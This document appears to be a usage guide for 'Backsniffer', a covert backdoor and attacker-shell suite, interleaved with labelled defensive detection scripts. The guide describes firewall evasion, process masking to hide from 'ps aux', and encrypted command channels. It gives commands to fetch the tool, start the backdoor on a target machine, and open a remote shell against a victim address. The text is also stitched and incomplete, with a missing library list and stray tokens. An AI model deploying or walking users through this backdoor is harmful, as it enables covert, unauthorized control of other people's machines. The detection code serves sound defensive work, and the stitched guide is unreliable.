Backsniffer is a covert communication suite that allows communication between an attacker and a backdoor application on a target’s compromised machine.
Backsniffer contains two modules:
1. Blackhat.py – This is the module that sends commands to the target and waits for replies.
2. Client.py – The actual “Back-Door” that can be run on the client machine.
Some features of the Backsniffer suite include:
• Firewall Evasion: Commands can reach the target machine even with a firewall running, because the backdoor uses raw sockets to sniff for packets instead of listening on an open port.
• Process Masking: The back-door module running on the client’s machine can camouflage itself by changing the name of its process. This allows it to remain invisible to usual detection methods such as running ‘ps aux’.
• Authentication: The backdoor checks each packet for a pre-determined TTL and destination port, two layers of authentication that ensure it only picks up messages that are meant for it.
• AES 256 Bit Encryption: All messages sent between the attacker module and the backdoor are encrypted using AES 256 bit encryption to mitigate any chance of easy discovery via packet captures.
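The three properties above (a fixed destination port, a fixed marker TTL, and an encrypted payload) are also what a defender can look for on the wire. The following is an added example, not Backsniffer code: it runs a simple flagging rule over constructed packet records. The PacketRecord fields, the watched port list, the "common initial TTL minus a realistic hop count" heuristic and the entropy threshold are this example's own assumptions.

```python
"""Added example (not Backsniffer code): flagging the covert-channel pattern described above.
All packet records below are constructed for illustration, not captured traffic."""
import math
from collections import Counter
from dataclasses import dataclass


@dataclass
class PacketRecord:
    """Metadata a sensor would keep per packet (field names are this example's assumption)."""
    src: str
    dst: str
    dport: int
    ttl: int
    payload: bytes


HTTP_PREFIXES = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                 b"OPTIONS ", b"PATCH ", b"CONNECT ", b"HTTP/")


def looks_like_http(payload: bytes) -> bool:
    """Empty payloads (SYN/ACK) are fine; otherwise expect a request line or status line."""
    return not payload or payload.startswith(HTTP_PREFIXES)


def normalized_entropy(data: bytes) -> float:
    """Shannon entropy divided by the maximum possible for this length (0.0..1.0).
    Ciphertext sits near 1.0; protocol text usually sits well below it."""
    if len(data) < 2:
        return 0.0
    n = len(data)
    h = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return h / min(8.0, math.log2(n))


def plausible_ttl(ttl: int, initial=(64, 128, 255), max_hops=30) -> bool:
    """A TTL is plausible if it is a common OS initial value minus a realistic hop count.
    A fixed marker such as 71 fits none of them within 30 hops (heuristic, not proof)."""
    return any(0 <= init - ttl <= max_hops for init in initial)


def flag_packet(pkt: PacketRecord, watched_ports=(80,)) -> list:
    """Return the list of reasons this packet looks like covert traffic (empty if none)."""
    reasons = []
    if pkt.dport not in watched_ports:
        return reasons
    if not looks_like_http(pkt.payload):
        reasons.append("non-HTTP payload on web port")
        # Only bother with entropy on payloads long enough for the measure to mean something.
        if len(pkt.payload) >= 32 and normalized_entropy(pkt.payload) > 0.9:
            reasons.append("high-entropy payload (possible ciphertext)")
    if not plausible_ttl(pkt.ttl):
        reasons.append(f"unusual TTL {pkt.ttl}")
    return reasons


def scan(records):
    """Return (index, reasons) for every flagged record."""
    hits = []
    for i, pkt in enumerate(records):
        reasons = flag_packet(pkt)
        if reasons:
            hits.append((i, reasons))
    return hits


SAMPLE = [  # constructed records, RFC 1918 addresses
    PacketRecord("10.0.0.5", "10.0.0.9", 80, 120,
                 b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"),  # ordinary web request
    PacketRecord("10.0.0.5", "10.0.0.9", 80, 71, bytes(range(64))),   # stand-in for a 64-byte encrypted payload
    PacketRecord("10.0.0.5", "10.0.0.9", 80, 71, b""),                # empty packet carrying only the marker TTL
    PacketRecord("10.0.0.5", "10.0.0.9", 443, 71, bytes(range(64))),  # not a watched port, ignored
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE):
        print(f"packet {idx}: {'; '.join(why)}")
```

The TTL rule is the cheapest signal: a marker value like 71 is far from any common initial TTL once realistic hop counts are considered, so it stands out even on packets with no payload. The entropy rule only adds confidence; the payload here is a constructed byte run with maximal entropy, standing in for ciphertext.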
1. Backsniffer requires that the following python libraries be installed
2. This can all be installed by running the shell script:
a. git clone https://github.com/tratnayake/8505A3-Backsniffer
b. cd 8505A3-Backsniffer
c. chmod +x startup.sh
Sending & Receiving Data
1. Starting the backdoor.
On the target machine, enter the command: python client.py 80 71 0123456789abcdef abcdefghijklmnop [Kickyou2:0]
The first two arguments specify that we are listening for packets with the following characteristics: (1) incoming to port 80 and (2) a TTL of 71. These are the criteria that identify packets as coming from the attacker.
Secondly, we enter our pre-shared encryption key and initialization vector. These two parameters allow us to encrypt and decrypt the messages between attacker and victim.
2. Starting the attacker’s shell.
On the attacker’s machine, enter the command: python blackhat.py 192.168.1.3(your victim) 500 80 71 0123456789abcdef abcdefghijklmnop
After the connection info has been entered, the attacker can simply begin entering commands as if he or she were using a shell on the victim’s machine.
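The backdoor started in step 1 relies on the Process Masking feature to hide from ‘ps aux’, which shows the process name the program chose for itself rather than the executable it was loaded from. The following is an added example, not Backsniffer code: a small check that compares a process's displayed name (comm and argv[0]) against the basename of its executable, run over a constructed process table. The field names, the sample entries and the matching rules are this example's own assumptions.

```python
"""Added example (not Backsniffer code): spotting a process whose displayed name
disagrees with its executable, the mismatch that process masking produces.
The sample process table is constructed; field names are this example's own."""
import os


def name_matches(shown: str, exe_name: str) -> bool:
    """True when a displayed name is consistent with the executable's basename.
    Tolerates login-shell dashes ("-bash"), versioned interpreters ("python3" vs
    "python3.8") and status strings ("sshd: alice [priv]"). /proc/<pid>/comm is
    truncated to 15 characters, so only that prefix is compared."""
    s, e = shown.lstrip("-")[:15], exe_name[:15]
    return bool(s) and (e.startswith(s) or s.startswith(e))


def find_masked_processes(entries):
    """entries: dicts with pid, comm (/proc/<pid>/comm), exe (readlink of
    /proc/<pid>/exe) and cmdline (NUL-separated argv). Returns the suspicious ones."""
    flagged = []
    for e in entries:
        exe_name = os.path.basename(e["exe"])
        argv0 = e["cmdline"].split("\0")[0]
        reasons = []
        if not name_matches(e["comm"], exe_name):
            reasons.append(f"comm {e['comm']!r} does not match exe {exe_name!r}")
        # argv[0] may be a full path or a bare name; accept either form.
        if argv0 and not (name_matches(argv0, exe_name)
                          or name_matches(os.path.basename(argv0), exe_name)):
            reasons.append(f"argv[0] {argv0!r} does not match exe {exe_name!r}")
        if reasons:
            flagged.append({"pid": e["pid"], "exe": e["exe"], "reasons": reasons})
    return flagged


def read_proc_entries(proc="/proc"):
    """Collect the same fields from a live Linux /proc (skips kernel threads and
    processes the caller is not permitted to inspect)."""
    entries = []
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        base = os.path.join(proc, name)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().rstrip("\n")
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().decode("utf-8", "replace")
        except OSError:
            continue
        if exe.endswith(" (deleted)"):  # binary removed after start; keep the original path
            exe = exe[: -len(" (deleted)")]
        entries.append({"pid": int(name), "comm": comm, "exe": exe, "cmdline": cmdline})
    return entries


SAMPLE_TABLE = [  # constructed process table
    {"pid": 1234, "comm": "python3", "exe": "/usr/bin/python3.8", "cmdline": "python3\0/opt/app/server.py"},
    {"pid": 2345, "comm": "bash", "exe": "/bin/bash", "cmdline": "-bash"},
    {"pid": 3456, "comm": "kworker/0:1", "exe": "/usr/bin/python2.7", "cmdline": "kworker/0:1"},  # interpreter posing as a kernel thread
    {"pid": 4567, "comm": "sshd", "exe": "/usr/sbin/sshd", "cmdline": "sshd: alice [priv]"},
]

if __name__ == "__main__":
    for hit in find_masked_processes(read_proc_entries()):
        print(hit["pid"], hit["exe"], "; ".join(hit["reasons"]))
```

Run as a script on Linux it walks the live /proc; the constructed table is what the test exercises. A renamed comm or argv[0] is one signal rather than proof, since the executable link can also be made to look ordinary, so treat hits as leads to confirm with the packet-level check rather than as a verdict on their own.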